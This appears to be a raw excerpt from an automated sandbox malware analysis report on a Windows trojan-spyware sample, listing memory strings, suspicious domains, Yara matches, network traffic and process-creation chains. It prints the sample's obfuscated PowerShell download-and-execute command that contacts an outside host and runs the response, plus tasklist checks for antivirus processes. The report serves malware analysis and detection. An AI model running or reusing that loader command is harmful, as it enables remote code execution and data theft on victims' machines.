BitLockerToGo.exe, 00000003.00000003.2625553232.0000000004DB6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2623771449.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2623459096.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2621837423.0000000004E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: BitLockerToGo.exe, 00000003.00000002.2756419053.0000000000527000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617473616.0000000000521000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
              Source: BitLockerToGo.exe, 00000003.00000002.2756645110.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754604014.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: BitLockerToGo.exe, 00000003.00000002.2756645110.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754604014.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtt
              Source: BitLockerToGo.exe, 00000003.00000002.2756419053.0000000000527000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617473616.0000000000521000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/l
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754752871.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2756419053.00000000004B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://maker.ifttt.com/trigger/%s/with/key/%shttps://www.googleapis.com/auth/cloud-platformingest.t
              Source: BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2504321115.0000000000548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/%s
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/G
              Source: BitLockerToGo.exe, 00000003.00000002.2756645110.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2530677325.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754604014.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2407805185.000000000052E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408545066.000000000052A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2407805185.000000000053C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/api
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/co
              Source: BitLockerToGo.exe, 00000003.00000003.2530677325.0000000000548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/pgR
              Source: BitLockerToGo.exe, 00000003.00000003.2530677325.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2504321115.0000000000548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/pi
              Source: BitLockerToGo.exe, 00000003.00000003.2504321115.0000000000548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/s
              Source: BitLockerToGo.exe, 00000003.00000003.2407805185.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/skQ&t)
              Source: BitLockerToGo.exe, 00000003.00000002.2756645110.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2530677325.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754604014.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2504321115.0000000000548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/ta
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754752871.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2756419053.00000000004B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click:443/api
              Source: BitLockerToGo.exe, 00000003.00000002.2756419053.00000000004B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click:443/apicrosoft
              Source: BitLockerToGo.exe, 00000003.00000003.2754410982.000000000051D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754410982.000000000052C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754706574.0000000000532000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://storage.mtls.googleapis.com/storage/v1/invalid
              Source: MdhO83N5Fm.exe, 00000000.00000002.2319135666.00000000029EB000.00000008.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000000.2060125186.00000000029D5000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.googleapis.com/auth/cloud-platform
              Source: MdhO83N5Fm.exe, 00000000.00000002.2319135666.00000000029EB000.00000008.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000000.2060125186.00000000029D5000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.googleapis.com/auth/cloud-platform.read-only
              Source: MdhO83N5Fm.exe, 00000000.00000002.2319135666.00000000029EB000.00000008.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000000.2060125186.00000000029D5000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.googleapis.com/auth/devstorage.full_control
              Source: MdhO83N5Fm.exe, 00000000.00000002.2319135666.00000000029EB000.00000008.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000000.2060125186.00000000029D5000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.googleapis.com/auth/devstorage.read_only
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.googleapis.com/auth/devstorage.read_onlyinappropriate_isolation_level_for_branch_transac
              Source: MdhO83N5Fm.exe, 00000000.00000002.2319135666.00000000029EB000.00000008.00000001.01000000.00000003.sdmp, MdhO83N5Fm.exe, 00000000.00000000.2060125186.00000000029D5000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.googleapis.com/auth/devstorage.read_writeB
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.googleapis.com/storage/%s/%s/%sidentity-chime-fips.us-east-1.amazonaws.comincorrect
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49776 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.152.160:443 -> 192.168.2.5:49782 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.5:49796 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000003.2259303619.000000000C31A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: 00000000.00000002.2323177283.000000000C31A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Sample or dropped binary is a compiled AutoHotkey binary
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
              Source: MBL4EF1WJ27Y40L4B4G3AI.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: MBL4EF1WJ27Y40L4B4G3AI.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: MBL4EF1WJ27Y40L4B4G3AI.tmp.9.drStatic PE information: Number of sections : 11 > 10
              Source: MBL4EF1WJ27Y40L4B4G3AI.tmp.7.drStatic PE information: Number of sections : 11 > 10
              Source: MBL4EF1WJ27Y40L4B4G3AI.exe.3.drStatic PE information: Number of sections : 11 > 10
              Source: MdhO83N5Fm.exe, 00000000.00000003.2259303619.000000000C2E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs MdhO83N5Fm.exe
              Source: MdhO83N5Fm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 00000000.00000003.2259303619.000000000C31A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: 00000000.00000002.2323177283.000000000C31A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@61/13@4/3
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3780:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2704:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeJump to behavior
              Source: MdhO83N5Fm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: BitLockerToGo.exe, 00000003.00000003.2364694477.0000000004A94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: MdhO83N5Fm.exeVirustotal: Detection: 14%
              Source: MdhO83N5Fm.exeReversingLabs: Detection: 28%
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeFile read: C:\Users\user\Desktop\MdhO83N5Fm.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\MdhO83N5Fm.exe "C:\Users\user\Desktop\MdhO83N5Fm.exe"
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe "C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe"
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeProcess created: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp "C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe "C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeProcess created: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp "C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp" /SL5="$A005E,7785838,845824,C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe "C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe"Jump to behavior
